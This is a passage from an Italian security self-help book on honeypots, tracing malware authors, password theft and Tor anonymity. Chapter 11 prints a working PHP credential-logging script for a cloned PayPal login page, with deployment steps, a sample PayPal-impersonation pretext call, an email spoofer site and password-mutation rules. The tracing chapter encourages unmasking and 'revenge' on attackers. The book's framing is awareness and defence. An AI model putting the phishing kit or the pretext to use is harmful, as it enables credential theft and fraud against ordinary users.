contro minacce che non possono vedere, ormai esistono svariati metodi per
bypassarli, il metodo classico è quello di sovra-stimolare il firewall con
richieste spam e spesso si riesce a far passare dati maligni, perché il firewall
non riesce a gestire correttamente tutte le richieste.

Basarsi solo su di loro per una buona difesa è da pazzi, inoltre non
possono proteggere l’azienda quando un virus utilizza un programma benigno
per camuffarsi e far passare dati tramite la rete.
 Stendendo un velo pietoso sui firewall, è il momento di descrivere tutti i
componenti di questo specifico Honeypot, come prima cosa, quando un
hacker bypassa il firewall e arriva all’Honeypot, la prima cosa che si attiva è
l’unità di monitoraggio, che si occupa di stabilire il metodo utilizzato
dall’hacker per penetrare nel network, la tipologia di pacchetti e il tipo di dati
contenuto, ossia l’attacco che sta lanciando o ha lanciato verso l’Honeypot, in
più registra tutti i file che sono stati modificati, i tasti che sono stati premuti e
via dicendo.

Dopodiché in seguito che l’unità di monitoraggio ha appurato che si

tratta di una vera minaccia, entra in gioco l’unità di allarme che contatta i sys
admin attraverso sms e email, ma in alcuni casi dato che può capitare che non
si ha il telefono sotto mano e dato che l’hacker può metterci una manciata di
minuti a fare danni enormi, queste unità di allarme sono collegate a veri e
propri allarmi anti incendio impossibili da ignorare, in modo che chi di
competenza possa intervenire prontamente per sventare la minaccia.

Come ultima sezione troviamo l’unita di log, una volta che l’attacco è
stato sventato e l’hacker scacciato, gli amministratori di sistema possono
analizzare il tutto accedendo all’unità di log, controllare eventuali bug
utilizzati dal malintenzionato per penetrare nel network e correggere
prontamente i bug, quest’ultima è la cosa più importante che un Honeypot ha
da offrire, la possibilità di essere serviti su un piatto d’argento i punti deboli
della propria azienda dovrebbe far gola a molte aziende, peccato che davvero
pochi li utilizzano seriamente.

Come ho detto prima questo è setup basico per un Honeypot, vediamo

tramite questo diagramma un sistema più avanzato:
 La cosa più importante che ci da questo sistema è il tempo, perché
chiunque affermi di aver costruito un sistema impenetrabile o ha problemi di
ego, oppure non è preparato sulla materia, online ci sono migliaia di individui
che non fanno altro che pensare a come aggirare sistemi come quello che
l’esperto di sicurezza di turno ha messo in piedi, quindi prima o poi il tuo
sistema verrà bucato, l’importante è essere lì quando succede.

Ritornando un attimo sui firewall, ci sono sistemi più efficaci per

controllare il traffico della propria rete locale e non, come primo troviamo gli
IDS (Intrusion Detection Sistem), che hanno la stessa funzionalità dei
firewall ma utilizzano un sistema di riconoscimento delle stringhe, come
fanno gli antivirus per capire se il traffico che sta entrando è maligno o
benigno, questo gli dà un vantaggio strategico ma come gli antivirus, non
possono vedere una minaccia che non conoscono, come per esempio la
vulnerabilità Heartbleed che ha colpito il protocollo OpenSLL, questa è
l’attuale signature che utilizzano i vari protocolli IDS per riconoscerla:

Se un hacker domani dovesse scoprire una seconda vulnerabilità per il

protocollo OpenSLL, questi sistemi sarebbero inutili perché non sarebbero in
grado di proteggere l’azienda, quindi ritorniamo sul fatto che il miglior modo
per sventare un attacco è mettere in piedi un sistema che metta in confusione
l’hacker e possibilmente esserci durante l’attacco, se pensiamo che aziende
come la NSA vengono hackerate, cosa può fare una enterprise medio –
grande contro questo genere di persone? Lascio a te la risposta, chiudiamo
con gli IDS per adesso.

Gli Honeypot possono essere configurati in base all’interazione che si

vuole l’hacker abbia con essi, come primi troviamo gli honeypot a bassa
interazione, come si può intuire dal nome sono quelli più blandi, atti
solamente ad identificare e registrare una quantità limitata di informazioni su
attacchi automatici, e imbrogliare gli hacker meno esperti, in genere gli
Honeypot di questo genere emulano solamente dei protocolli specifici, come
server FTP o http.

Poi ci sono gli Honeypot a media interazione, si collocano a metà tra

quelli a bassa interazione e ad alta interazione, non sono un vero e proprio
sistema operativo, ma neanche una mera emulazione di porte come quelli a
bassa interazione, il loro scopo primario e fornire l’output a qualsiasi cosa fa
l’hacker, detto in parole povere, servono per rispondere a qualsiasi attacco
esegue l’hacker sulla macchina in maniera realistica, in modo da convincerlo
che si tratta di un vero server, così da poter analizzare il Malware che userà
per l’attacco, viene comunemente utilizzato per la sicurezza aziendale.

Come ultimo ma non meno importante troviamo gli Honeypot ad alta

interazione che sono dei sistemi operativi veri e propri, data la loro struttura
complessa, richiedono molte risorse e costituiscono un rischio maggiore per
la persone che lo utilizza, ma allo stesso tempo è possibile registrare un
maggior numero di operazioni da parte dell’hacker, dato che essendo una
macchina reale, può penetrare nel cuore del sistema e lanciare un altro tipo di
attacchi, per questa ragione questi Honeypot vengono utilizzati
prevalentemente per la ricerca.

È difficile trovare dei buoni honeypot disponibili in commercio, questo

perché anche gli hacker li conoscono molto bene quindi se gli capitasse di
attaccarne uno, saprebbero riconoscerlo, ecco perché o ci sono soluzioni
premium che costano oltre 1000 euro, o soluzioni completamente
personalizzate, ossia Honeypot programmati da zero per una determinata
azienda, qui ne elencherò alcuni a pagamento e non per darti un’idea di come
sono strutturati:

Valhala Honeypot

Un ottimo HP open source, è un misto tra bassa e media interazione, alcuni

servizi sono emulati ma non danno nessun output, mentre altri sono reali, se
vuoi provare qualcosa del genere sul tuo sistema, non posso che consigliarlo.
HoneyDrive

Se vuoi trasformare un computer in disuso in un honeypot e non vuoi

rinunciare ad una soluzione gratuita e opensource, HoneyDrive è una distro
per Linux che ti permette di riciclare una vecchia macchina, installarci l’ISO
ed ottenere un honeypot a media interazione davvero ben fatto, emula una
grande varietà di servizi e per i meno esperti possiede ben 10 configurazioni
già pronte da utilizzare qualsiasi siano le tue esigenze, l’ho utilizzato per
qualche progetto e mi sono sempre trovato bene.
HoneyBOT

Anche questo rientra tra i miei preferiti, è un Honeypot a media interazione

per Windows che emula alla perfezione più di 20 protocolli diversi, dato il
suo costo esiguo è una scelta consigliata per chiunque voglia avere il suo
piccolo Honeypot aziendale per rendere la propria azienda più sicura, è anche
disponibile una versione gratuita per studenti.
KFSensor

Se invece fai sul serio e ti interessa un Honeypot commerciale, KFS è il top

della sua categoria, viene consegnato con vari setup già pronti per adattarsi a
qualsiasi ambito aziendale, possiamo tranquillamente dire che è il sogno
proibito di ogni sys admin, il costo non è altissimo, anzi rispetto ad altre
soluzioni in commercio, direi che questo è un ottimo Honeypot per una media
impresa, che tiene ai suoi dati e non vuole risparmiare sulla propria sicurezza.

Per chiudere, è possibile anche attivare honeypot per server php o mysql
per proteggere al meglio le tue proprietà web, questi meravigliosi alleati sono
una manna dal cielo per gli amministratori di sistemi, tutti dovrebbero
utilizzarli ed imparare a farne il loro migliore alleato.
 Capitolo 10: In Che Modo Rintracciare L’Hacker

Ora che abbiamo chiarito il fattore difesa, quando abbiamo l’eseguibile con
allegato il codice maligno abbiamo due scelte, possiamo eliminarlo, oppure
provare a rintracciare l’hacker ed eventualmente denunciarlo o qualsiasi cosa
si abbia in mente di fare.

Tramite questo metodo è possibile rintracciare dove l’hacker sta

inviando i log del tuo computer, ossia password, screenshot del tuo desktop,
immagini della webcam e così via.

In genere chi infetta con il Malware non sono hacker di alto livello, anzi
non dovrebbero neanche essere chiamati hacker ma per convenienza è meglio
chiamarli così, comunque i meno esperti utilizzeranno il proprio indirizzo
email o lo spazio web personale per ricevere i log, chi è alle prime armi
spesso non realizza in cosa si sta cacciando.

Abbiamo a disposizione tre metodi per tracciare il nostro carnefice, per

mettere in atto il primo abbiamo bisogno di un programma chiamato BinText
e il nostro Malware formato exe, ecco il programma:
 Il primo passo è selezionare il Malware cliccando Browser e avviare il
processo con Go.
 Come terzo passo dobbiamo utilizzare la funzionalità ricerca per
ricercare specifiche parole chiave nel codice, in questo caso stiamo
ricercando la Mail in quanto con questo metodo il server FTP non è sempre
visibile.

Consiglio di cercare parole chiave tipo: “gmail” “libero” “hotmail” in

modo da provare ad indovinare il tipo di provider, quando identificheremo
quello giusto, vedremo una schermata del genere.

Si, mi sono divertito a rintracciare il Malware del generatore di Steam

Se si tratta di Gmail, possiamo rintracciare il nome seguendo questi

passaggi:

1. Entra in Google Calendar

2. Seleziona “Condividi Il Calendario”
3. Inserisci L’email appena recuperata
4. Seleziona Ok e quando ritornerai alla schermata il nome sarà lì.

Questo è tutto per il primo metodo, come puoi vedere è abbastanza

semplice e non richiede particolari conoscenze tecniche, è un buon modo per
vendicarsi, in questo caso in modo lecito, del torto subito.

Passando al secondo metodo, useremo il prompt dei comandi per

visualizzare le connessioni attive che escono ed entrano dal nostro computer.

Per prima cosa dobbiamo controllare se l’hacker è connesso al nostro

computer, per fare ciò dobbiamo aprire il prompt dei comandi, per chi non sa
cos’è ecco un’immagine:

È possibile aprirlo cercando in Win7/8 “cmd”

Una volta aperta la schermata somiglierà molto a quella sopra, esiste un

programma che viene fornito assieme a Windows che ci permette di vedere
tutte le connessioni attive dal nostro pc, per avviarlo, dobbiamo scrivere
“netstat –b” per visualizzare le connessioni attive e la relativa porta.
 Mentre se vogliamo elencare tutte le connessioni in ordine numerico
possiamo utilizzare il comando “neststat –an”, di seguito apparirà:

Quando notiamo un indirizzo ip non nella norma, possiamo tracciare la

sua posizione attraverso vari tools online, uno dei tanti è iptrackeronline.com,
inserendo l’ip del hacker nel campo apposito, riuscirai a vedere di dov’è e
altre informazioni utili, se invece ha utilizzato un VPN per collegarsi, allora
purtroppo non può essere tracciato con metodi così semplici.

Il terzo è ultimo metodo si basa sull’uso di Wireshark, viene impiegato

per sniffare i pacchetti della rete locale, ma in questo caso lo useremo per
sniffare e leggere il contenuto dei pacchetti che manda l’hacker verso
l’esterno, alcuni Malware come gli Stealer per esempio, aggiornano ogni ora
le informazioni sulle password, se utilizziamo Wireshark per catturare i
pacchetti, avremo la possibilità di catturare le informazioni e leggerne il
contenuto.

I contenuti che possiamo sniffare sono i dati del server FTP che usa
l’hacker per conservare i log delle sue vittime.

Prima di tutto devi installare Wireshark scaricabile qui:

wireshark.org/download.html. Inoltre assieme al programma ti verrà chiesto
di installare anche Wincap, fallo.

Dopo aver installato tutti i driver necessari, non ci resta che aprire il
programma e cliccare sul tasto “capture” in alto a destra, il programma
inizierà a collezionare i pacchetti che passano per la tua rete locale e la
schermata apparirà più o meno così:
 Dopo aver cliccato il tasto capture, l’ultimo passo da fare è scrivere
“ftp” nella casella “Filter”, facendo così il programma mostrerà solo i
pacchetti che contengono quella specifica parola, possiamo lasciarlo aperto
qualche ora e se abbiamo avuto fortuna, vedremo una cosa simile a questa:
 Una volta che abbiamo rintracciato il nome del server FTP possiamo
contattare l’hosting di appartenenza per segnalare l’accaduto.

Molti hacker alle prime armi come detto prima non prendono molto
seriamente la sicurezza, quindi è possibile trovare uno spazio web intestato ad
una persona reale.

Ho voluto fornirti questo tipo di conoscenza perché la sensazione di

avere la propria privacy violata è davvero terribile, spesso non sappiamo
proprio cosa fare e ci sentiamo spaesati, con questo tipo di informazioni
possiamo lanciare la nostra offensiva e dare il nostro contributo affinché la
persona che ha eseguito l’intrusione paghi.
 Capitolo 11: Come Ti Rubano La Password

I Malware non sono l’unico metodo che utilizzano gli Hacker per accedere ai
tuoi dati personali, le password sono l’unica forma di sicurezza che protegge i
tuoi dati da occhi indiscreti, e ci sono svariati modi per chi ne ha le
conoscenze di entrarne in possesso, in questa sezione analizzeremo due
metodi più efficaci utilizzati dagli hacker.

Per fornirti una conoscenza completa voglio elencare anche il metodo

che si utilizzava anni fa quando non esistevano programmi specifici per
l’occasione, ma non è assolutamente meno efficace di altri, anzi viene
utilizzato ancora oggi da tutte le aziende di pen test del mondo, ma vengono
messi in pratica quando non c’è alcuna possibilità di exploitare il sistema con
metodi informatici.

Stiamo Parlando Dell’Ingegneria Sociale

Questo esempio che sto per illustrare consiste nell’ottenere la fiducia

della vittima rivestendo una figura autoritaria, fa leva su uno dei 6 principi
della persuasione di Cialdini, ossia l’autorità, le persone tendono ad obbedire
quando si trovano al telefono o di fronte una persona che riveste una certa
posizione, un esempio di telefonata con la vittima può essere:

“Salve Sig.ra Maria, siamo del dipartimento frodi informatiche di

Paypal, i nostri sistemi hanno riscontrato una violazione del suo
account e abbiamo al momento bloccato i fondi per tenerla al
sicuro, il malintenzionato in qualche modo ha bloccato l’accesso
al server e non riusciamo a reperire la sua password per svolgere
ulteriori controlli, può fornirci la sua password per la sua
sicurezza?”
 Spesso e volentieri la vittima cede la password e l’operazione è
compiuta, ma c’è molto di più su questa tecnica, prima di tutto ci sono 4 tipi
di social engineer in giro da cui dobbiamo guardarci.

Hackers – Sono considerati i SE più popolari, non a caso Kevin Mitnick è

tutt’oggi conosciuto come il migliore social engineer dei nostri tempi, quando
fu catturato dagli agenti federali, gli imputarono un capo d’accusa di truffa
per aver rubato 20,000 numeri di carte di credito.

Pen Testers – Se gli hacker lo fanno per diletto, i Pen tester lo fanno per
lavoro, è loro compito penetrare nel sistema del loro datore di lavoro, per
istruire gli impiegati a non rilasciare informazioni sensibili sull’azienda.

Impiegati Arrabbiati – Questi sono quelli da cui, se hai un’azienda devi

prestare molta attenzione, ho avuto un caso del genere nell’azienda di
famiglia e fortunatamente sono riuscito a riconoscere in tempo tutti i segnali,
in genere quando un impiegato non è contento della sua posizione, tende ad
assumere un comportamento chiamato “protective behavior patter” che lo
porta a lavorare di più e prendersi più responsabilità sul posto di lavoro,
inoltre questo tipo di impiegato spesso non si sente apprezzato e si arrabbia
per le piccole cose ed è spesso freddo e anti-sociale verso i colleghi.

Governi – Qui parliamo dei maestri assoluti, nessuno è più bravo dei governi
a dare l’illusione al popolo di avere il controllo, Edward Bernays, il padre
delle pubbliche relazioni e nipote di Freud, manipolava le masse tramite il
subconscio, in un suo scritto, sostenne che le persone devono essere
manipolate dai governi, perché la stessa manipolazione è un elemento chiave
per far funzionare la democrazia.

Ritornando a parlare di SE malintenzionati, ossia gli hacker, non tutti

utilizzano il computer o la linea telefonica per perpetrare questo tipo di
attacchi, alcuni si fanno assumere dall'azienda che intendono attaccare, o
entrano fingendosi tecnici chiamati dall'azienda stessa, con tanto di tesserino
e lascia passare, mentre altri si limitano a convincere la vittima ad aprire una
pagina web, lasciare una porta aperta o inserire una chiavetta USB nel
proprio computer.

Molto spesso il SE utilizza LinkedIn per scegliere la sua vittima ideale,

come per esempio un impiegato che ha accesso admin alla sala server, o un
semplice commesso che ha accesso ad un computer connesso alla rete locale,
molto spesso utilizzano una tecnica chiamata squatting, ossia rubare l'identità
di un amico della vittima per chiedere favori, come aprire un documento con
dentro codice maligno.

I SE sono dei maestri persuasori, spesso copiano il comportamento di

chi gli sta intorno per non destare sospetti, si mostrano curiosi e fanno
domande mirate alla vittima, in modo che quest'ultima senta pressione sociale
e voglia rispondere nel modo corretto, e non per ultimo sfruttano il principio
della reciprocità, ossia fanno regali, offrono caffè, si mostrano sempre
disponibili nella speranza che il favore venga ricambiato.

C’è davvero molto da dire su questo argomento, ma questo libro non è

improntato su questo argomento, magari un secondo libro.

Mettendo da parte il SE, esistono programmi specifici per trovare la

password di qualsiasi account, che sia Paypal, Facebook, Gmail, Hotmail e
così via, questi programmi si basano su un metodo detto brute-force, in
pratica provano varie combinazioni di password fin quando non riescono ad
indovinare quella giusta ed avere accesso all’account.

Ci sono due distinti metodi per mettere in pratica questo tipo di attacco,
nel primo caso l’hacker non ha in mente un bersaglio preciso, quindi utilizza
dei programmi che raccolgono tutti gli username di una piattaforma, detti
username scraper, una volta raccolti, lì associano a delle password generiche
e iniziano il processo di cracking, la velocità e l’efficacia del processo
dipende molto dalla qualità della lista che si è procurato ma soprattutto dalla
velocità della macchina.

Nel secondo caso invece l’hacker ha in mente un obiettivo specifico,

come prima cosa farà delle ricerche sulla vittima, studierà i suoi interessi,
famiglia, date di nascita, lavoro, animali domestici…in pratica tutte le
informazioni possibili su quella persona, in seguito utilizzerà del programmi
che generano liste di password basate sulle parole che sono state inserite nel
programma, per esempio se come password abbiamo messo il nome della
fidanzata, il programma genererà una lista con tutte le varianti possibili che
possiamo utilizzare:

- Numeri al posto delle lettere (4l3ss14)

- Numeri alla fine della parola (alessia0-1000)
- Numeri al inizio di una parola (0-1000alessia)
- Caratteri speciali alla fine di una parola (alessia!?£$% etc…)
- Caratteri e numeri speciali assieme (alessia0-100!?ӣ$)
- Maiuscole e minuscole (AlessiA)

Questa operazione viene ripetuta per ogni parola che l’hacker ha scelto,
ciò vuol dire che se ci limitiamo a scegliere password che le persone possono
individuare studiando la nostra persona, anche se abbiamo preso precauzione
utilizzando numeri, maiuscole e caratteri speciali, alla fine l’hacker se
persevera riuscirà ad ottenere la password.

Questo è un esempio di bruteforcer in grado di crackare le password di

diversi provider:
 Mentre questo è un esempio di un programma solo incentrato a
“recuperare” password Gmail.

Per ovviare a questo problema non dobbiamo fare altro che scegliere
una password più complessa e meno prevedibile, molti scelgono una
password semplice perché hanno paura di dimenticarla, a questo proposito ti
consiglio di scaricare LastPass, un programma che ti permette di gestire tutte
le tue password con una sola Master Password, dopo averla inserita il
programma compilerà automaticamente tutti i campi che necessitano la
password.

In più se ricordi il discorso degli Stealer, utilizzando LastPass il

Malware non sarà in grado di recuperare le password in quanto sono criptate
e non memorizzate nel browser.

Inoltre per aggiungere un ulteriore grado di protezione alle nostre

password, non dobbiamo per forza sceglierle troppo lunghe, possiamo
utilizzare i simboli ascii per renderle quasi impossibili da indovinare, qui
trovi una lista di tutti quelli che puoi utilizzare: alt-codes.net.

Personalmente il mio preferito è quello che si genera con alt + 1456.

Quando il brute force non funziona, in genere gli hacker passano ad un

approccio più sofisticato, ossia il phishing, il processo di rubare informazioni
sensibili come username, password, credenziali bancarie fingendo di essere
l’organo di competenza preposto.

Sono quelle mail che ogni tanto arrivano e ti dicono di aggiornare le tue
informazioni bancarie o che la tua password di Facebook è stata
compromessa, nel 99% di questi non dobbiamo preoccuparci in quanto sono
creati da hacker con poca esperienza e l’utente può facilmente riconoscere
attraverso errori di vario tipo, il sito fasullo o errori grammaticali.

Non andrò nel dettaglio di come evitare di cadere in questo genere di

trucchi in quanto la maggior parte delle volte basta guardare la barra degli
indirizzi e il certificato del sito web, tipo questo:
 Preferisco spiegarti quello che in genere nessuno spiega, come fa
l’hacker a produrre queste pagine Phishing in davvero pochissimo tempo.

Per prima l’hacker sceglie il provider che vuole impersonificare, in

genere per ottenerne anche un ritorno economico scelgono compagnie
bancarie o processori di pagamento online come Paypal, in questo caso
prenderemo quest’ultimo come esempio.

Dopodiché salva la pagina di login sul proprio PC, se il tuo browser è

Chrome si fa così, in genere è simile per tutti i browser.

Una volta salvata la pagina basta rinominare il file HTML in “index” e

l’hacker avrà appena ottenuto la perfetta copia della pagina di login di
Paypal, adesso la cosa che manca è uno script che registra su un file di testo
le credenziali d’accesso una volta che l’utente le inserisce e clicca su accedi.
 Di seguito puoi vedere un esempio del file PHP che userebbe l’hacker
per rubare i tuoi dati dalla pagina in questione:

<?php // Questo è il classico tag che precede uno script in php.

Header(“Location: https://www.google.it/url?
sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0CCMQFjAA&u
6FzQuwF1GV-ecXw&bvm=bv.85970519,d.d2s “); // Appena l’utente clicca
“Accedi” questa linea di codice server per redirezionarlo sul suo ufficiale
Paypal in modo che l’operazione sembri meno sospetta.
$handle = fopen(“lista.txt”, “a”); // Questo commando comunica al server
di aprire il file “lista.txt” e prepararsi a ricevere I dati.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // Questa sezione assegna semplicemente tutte le informazioni che lo script
andrà a recuperare tramite una variabile.
Fwrite($handle, “\r\n”); // Questo comanda di scrivere le informazioni
raccolte nel file “lista.txt”
fclose($handle); // In fine questo commando chiude la connessione con il file
“lista.txt”
exit;
?> // Questo segna la fine dello script.

Se hai scelto di provare questo script per scopi didattici e caricarlo nel
tuo server locale, i file che a questo punto abbiamo accumulato nella cartella
sono:
 Il prossimo passo che l’hacker deve fare per avere una pagina phishing
funzionante è editare il link del bottone “Accedi” e sostituirlo con il proprio
file PHP, prima di tutto dobbiamo aprire il nostro file HTML e cercare la
parola “action” sostituire il link presente all’interno con il nostro file php e
cambiare il comando del tag method da “post” a “get”.

L’ultimo passo da fare per l’hacker è caricare i file presso uno spazio
web e impostare i permessi affinché lo script funzioni a dovere, ossia 777 per
il file di testo.

Ora sai praticamente come fanno gli hacker a creare pagine phishing,
questo è il metodo migliore, alcuni hacker alle prime armi non arrivano a
questi livelli, basta guardare le pagine phishing che utilizzano…almeno
quelle che arrivano nella mia posta elettronica sono sempre poco credibili.

La seconda cosa da fare è inviare l’email, per essere convincenti

utilizzano due metodi:

• Cercano di registrare un indirizzo email e dominio più simile possibile

al provider che vogliono impersonare.
• Utilizzano un Email Spoofer, come questo https://emkei.cz/ per inviare
una email a nome di terzi.

In genere è possibile sempre scoprire se l’indirizzo email è reale,

vedendo nei dettagli della email.

Chiudendo il discorso phishing, c’è un altro metodo che utilizzano per

scoprire la password della tua casella email, ma sta pian piano svanendo dato
il crescente interesse per la sicurezza delle password dai provider email.

Spesso gli hacker cercano di recuperare la password del tuo account,

tramite la domanda segreta, o qualche altro sistema messo in pratica dai
provider per favorirti in caso dimentichi l’accesso.

Gli hacker scrutano il tuo Facebook, leggono quanto più è possibile su

di te e quando hanno sufficienti informazioni vanno all’attacco, il processo è
simile per tutti i provider.

Per ovviare a questo problema se sei su Gmail, devi abilitare il login

con 2 passaggi, su questo link:

google.com/landing/2step/

Per gli altri fornitori dovrebbe essere più o meno la stessa cosa, naviga
tra le impostazioni e controlla se c’è qualche strumento come quello sopra
che può aiutare a rendere più sicuro il tuo account.

La tua password può essere rubata anche da persone che hanno accesso
alla tua rete Wi-Fi in un modo abbastanza semplice (per chi lo sa fare).
 Tra poco scoprirai perché devi fare sempre attenzione a qualsiasi
“ospite” fai collegare anche volontariamente sulla tua rete Wi-Fi o alla
password da impostare per ottenere un livello di sicurezza ottimale.
Capitolo 12: Anonimato E Protezione Dati Sensibili

Per l’hacker è fondamentale mantenere un completo anonimato, un solo

errore di valutazione può portarlo dietro le sbarre, spesso gli hacker
principianti e intermedi, usano dei metodi per nascondere le loro tracce rozzi
e poco efficaci.

Questo è uno dei temi caldi del momento, non solo i malintenzionati ma
tutti vogliono capire come restare anonimi per riconquistare un briciolo di
privacy, la buona notizia è che alcuni metodi utilizzati dagli hacker, possono
applicarsi benissimo sia all'utente medio che quello un po’ più navigato.

Il browser consigliato per svolgere questo tipo di attività è Firefox, in

quanto sono possibili molte modifiche e ci sono molti plug-in che possono
aumentarne la privacy, la controparte sconsigliata è Chrome in quanto è più
soggetto a problemi di privacy.

Molti si preoccupano solo di mascherare il proprio IP per non essere

rintracciati, il che è un classico errore da principiante, il tuo browser lascia
delle tracce che possono compromettere il tuo anonimato in men che non si
dica, il primo fattore a cui devi fare attenzione è l'user agent, che sono delle
stringhe che il tuo browser manda ai siti che visiti per fargli capire cosa stai
utilizzando per navigare.
 Dato che sulla stringa possiamo chiaramente vedere varie informazioni
sul sistema che stiamo usando, è necessario nascondere questo parametro, per
fare questo possiamo semplicemente scaricare l'estensione override user
agent per firefox che ti permette di cambiare il tuo user agent perfino in
Google Bot.

Se si effettua questa modifica in un network pubblico, come per

esempio a lavoro o in un bar, l'amministratore di rete può facilmente scoprire
chi sta cercando di nascondere la propria identità utilizzando il comando TTL
(Time to Live) che controlla i clienti connessi alla rete e i pacchetti che
emanano, identificando quelli sospetti che poi possono essere terminati
automaticamente o notificati a chi di competenza.

Un’altra cosa che è bene nascondere è il Referrer Url, ossia il sito da cui
si è partiti per arrivare al sito target, per esempio, directorybanke.it a
Bankpincopallo.it, quindi può essere utilizzato per tracciare i movimenti di
qualsiasi persona su internet, per firefox c'è una semplice soluzione per
nascondere questo parametro, basta digitare nella barra degli indirizzi
"about:config" e cercare "network.http.sendRefererHeader", una volta
trovato, impostare il valore su 0 ed il gioco è fatto, mentre se si vuole
installare un plug-in, basta cercare RefControl, ultimamente alcuni siti stanno
utilizzando la tecnologia HTML5 Canvas per tracciare a marchiare il tuo
browser con un numero identificativo unico, come un impronta digitale, a
questo c’è un esenzione sperimentale che blocca questo di nome
CanvasBlocker

Come ultima cosa ci sono i cookie, che servono per tracciare la tua
attività, spesso quando vai su un sito per acquistare qualcosa e poi vedi quella
stessa pubblicità dappertutto, sono proprio loro, possiamo disabilitarli, ma
presto noteremo che non ci sarà possibile avere accesso ad alcuni siti, molti
utilizzano l'eliminazione automatica dei cookie appena si termina la sessione,
ma pochi sanno che esistono dei cookie "a lungo termine" che non vengono
cancellati con questa procedura, per ovviare a questo problema, basta
scaricare l'esenzione "BetterPrivacy" e il problema è risolto.

Come ultime accortezze, molti di noi utilizzano Google come pagina

principale, così possiamo cercare immediatamente quello che ci serve, ma
non pensiamo che tutte le ricerche che facciamo vengono tracciate e
catalogate, pronte ad essere usate contro di noi, a questo proposito possiamo
impostare come pagina iniziale startpage.com, mentre questi sono altri plug-
in da installare per mantenere una privacy elevata:

• HTTPS Everywhere
• Privacy Badger
• µMatrix

Chiudendo il discorso browser, adesso possiamo passare a scoprire le

vere tattiche di anonimato, quasi tutti conoscono Tor, il programma per
accedere ai link onion e nascondere il proprio indirizzo IP, viene decantato da
tutti come sicuro ma in realtà sicuro non è, ma vediamo precisamente come
funziona.
 Quando ci colleghiamo alla rete TOR, la prima cosa che notiamo è la
connessione estremamente lenta, questo perché la connessione passa per 3
punti, ossia tre computer a loro volta connessi alla rete, a questo punto
possono succedere 2 cose, o ci si connette ad una rete di computer lenti, o una
veloce, questo influenza la velocità di connessione, qui sotto il diagramma:

La connessione in genere passa per tre nodi, ma non è una regola fissa,
in realtà a volte sono anche quattro o cinque, ad ogni nodo la connessione
viene criptata con una chiave diversa ogni volta e viene decodificata al nodo
d’uscita in modo che il server onion possa comprendere la richiesta, come
vediamo in questo diagramma sotto:
 Decifrare questi dati può richiedere anni, alla fine tutte le forme di
sicurezza possono essere nullificate, la debolezza di Tor sta nei suoi nodi e
nei vari passaggi, il messaggio viene criptato completamente quando arriva
verso la fine del nodo, come può qualcuno intercettare la nostra connessione
o tracciare proprio la nostra richiesta tra milioni di altre?

In realtà ci sono dei metodi per tracciare il nostro uso di Tor, mettiamo
il caso che le autorità competenti ti stanno tenendo d’occhio da un po’, con
un furgoncino sono parcheggiati sotto casa tua, e dopo aver violato la tua rete
Wi-Fi ora stanno sniffando tutte le tue comunicazioni, se stai utilizzando Tor
non riceveranno altro che dati incomprensibili, quindi aspetteranno un tuo
passo falso per procurarsi un mandato, entrare in casa tua e sequestrare tutto
quello che gli possa sembrare incriminante, ovviamente il tuo computer o
laptop è la prima cosa che guarderanno.
 Utilizzeranno vari tools e strategie che non tratterò in questo libro.

Avendo appurato l’uso di Tor si può proseguire a copiare tutti i dati per
poi analizzarli, tra i dati sensibili che si possono recuperare troviamo:

Il file “state” nella cartella \Data\Tor contiene informazioni riguardanti

l’ultimo avvio dell’applicazione, questa informazione può rivelarsi utile nel
caso siano stati pubblicate informazioni sensibili su internet, come carte di
credito o altro, se le date dell’avvio di Tor e della pubblicazione combaciano
l’indagine è già a buon punto.

Inoltre mostra il processo la lettera del driver da cui è stato lanciato:

 Dopodiché possiamo trovare il file “compatibility.ini” nel percorso che
svelerà il percorso d’avvio del browser di Tor, così è possibile capire se ha
utilizzato una chiavetta usb, o un semplice portatile, è un’informazione
cruciale anche per cercare di effettuare un recupero dati, se il materiale
incriminante è stato cancellato.

Altri file che si possono utilizzare per conoscere informazioni preziose,

sono i file PREFETCH, che vengono creati automaticamente da Windows per
avviare più velocemente le applicazioni, i file che vengono creati per Tor
sono:

• TORBROWSERINSTALL-(Versione)-(Hash Indirizzo).pf
• TOR.EXE-(Hash Indirizzo).pf
• START TOR BROWSER.EXE-(Path Hash).pf

Questi file se analizzati con specifici programmi adatti allo scopo, come
Internet Evidence Finder, possono svelare la data di installazione, la prima
esecuzione di Tor, l’ultima esecuzione ed il numero di esecuzioni totali.

Mentre come ultima vulnerabilità, possiamo analizzare il file

PAGEFILE.SYS, che è il file che usa Windows per salvare parte della RAM,
affinché l’avvio del sistema e di tutte le applicazioni coinvolte sia più veloce,
analizzando la stringa “http-memory-only-PB” è possibile recuperare i siti
visitati con il browser associato a Tor.
 Quando il sequestro del computer stesso non è possibile ci sono vari
attacchi che si concentrano direttamente sulla rete Tor, per ottenere
informazioni sensibili che possono portare ad una perdita rilevante di
anonimato, ci concentriamo solo sui due più efficaci:

Application Layer Attacks

Questo tipo di attacchi si basa sulla strategia di sfruttare le vulnerabilità in

torbutton per ottenere informazioni cruciali, si utilizzano per farlo plugin
flash, cookie e javascript per inviare un tipo di dati che mandano in errore il
protocollo Tor, quindi bypassano le impostazioni di proxy rivelando
informazioni sulla macchina in uso.

Per esempio, visitiamo un sito non per forza sulla rete Tor, quando
finiamo di caricare la pagina, un codice javascript si esegue e da istruzioni al
browser di ricaricare la pagina ogni 30 secondi, dato che Tor è spesso lento,
molti lo disabilitano momentaneamente per caricare la pagina, appena
succede il browser aggiorna la pagina, e il server cattura il tuo vero ip.

Ci sono metodi per guardare la cronologia degli utenti Tor, la grandezza

in pixel della finestra del browser, user agent, lingua e altro, questi sono tutti
metodi per identificare la vittima caso mai dovesse tornare su quello stesso
sito con un ip diverso.

Exit Relays Snooping

Tor è formato da tanti volontari che mettono a disposizione risorse per far
crescere la rete, tutti possono oggi creare un server e metterlo a disposizione
della rete, e fin quando sono persone affidabili, non c’è nessun problema, ma
cosa succede quando un malintenzionato crea un server Tor con l’unico
scopo di scoprire informazioni? L’exit Snooping.

Tor nasconde la tua posizione ma non cripta magicamente tutto il

traffico, ad un certo punto quel traffico deve essere visibile ai server per
poterlo interpretare, quindi finché vuoi proteggere i tuoi dati nella tua rete
locale, non c’è nessun problema, quando invece i dati passano per un nodo
d’uscita maligno, la persona che lo gestisce sarà in grado di leggere
chiaramente i dati, ma non di sapere chi sei o rilevare la tua posizione.

Tor viene posizionato come servizio di anonimato per eccellenza ma

